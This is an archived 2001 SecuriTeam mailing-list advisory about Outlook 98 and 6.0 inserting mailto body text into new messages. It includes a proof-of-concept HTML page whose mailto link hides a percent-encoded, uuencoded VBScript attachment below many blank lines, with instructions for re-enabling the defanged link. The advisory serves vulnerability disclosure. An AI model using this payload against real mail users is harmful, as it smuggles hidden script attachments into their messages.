[NEWS] Mailto Links Pose a Security Threat
From: support@securiteam.comDate: 09/20/01
- Previous message: support@securiteam.com: "[NEWS] Myownemail.com Accounts Vulnerable to Script Attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [NEWS] Mailto Links Pose a Security Threat Message-Id: <20010920132640.DD910138C1@mail.der-keiler.de> Date: Thu, 20 Sep 2001 15:26:40 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Mailto Links Pose a Security Threat
------------------------------------------------------------------------
SUMMARY
Some mail agents handle mailto (HTML Tags) links insecurely and include
any information after the BODY parameter inside the letter. The
vulnerability allows an attacker to cause the victim to open a new email
message and insert an attachment into it without the user knowing about
it.
The email will not be sent, however, without manual user intervention.
DETAILS
Vulnerable systems:
Outlook version 6.0
Outlook version 98
Immune systems:
Outlook version 2000 SR-1
Netscape Communicator
HTML Example:
<html>
<head>
<title>Demonstration of Malicious mailto's</title>
</head>
<body>
<b> Please click this friendly link to send me mail </b><br>
<!-- This Link should hide a uuencoded VBScript at the bottom of a email
-->
<!-- Written & Discovered by <DontPanic999@yahoo.com> -->
<!-- nb. Works just the same without the "Always Scroll Down bit" ! -->
<a
hr3f="mailto:victim@victim.com?body=Always%20Scroll%20Down%20When%20Following%20mailto's!%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%62%65%67%69%6E%20%36%36%36%20%78%2E%76%62%73%0D%0A%4D%33%35%2D%27%30%44%5D%38%28%45%31%48%3A%37%2C%40%3D%56%25%53%28%26%24%40%3A%26%45%44%39%26%35%4E%28%26%25%54%3D%26%25%43%3A%26%55%45%3B%47%30%41%28%23%51%44%3B%56%59%54%3C%26%25%4E%0D%0A%31%3A%36%2C%59%2E%33%45%20%3E%36%25%48%3B%56%5C%4E%38%56%5D%4D%2F%42%28%60%0D%0A%60%0D%0A%65%6E%64%0D%0A">webmaster@notavictim.com</a><br>
<p>
</body>
</html>
(NOTE: The code does not work 'as-is'. In order for it to function,
replace 'hr3f' with 'href')
ADDITIONAL INFORMATION
The information has been provided by <mailto:dontpanic999@yahoo.com>
[Segmen], <mailto:craig.humphrey@chapmantripp.co.nz> Craig Humphrey, and
<mailto:lennard.bakker@cmg.nl> Lennard Bakker.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Myownemail.com Accounts Vulnerable to Script Attack"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
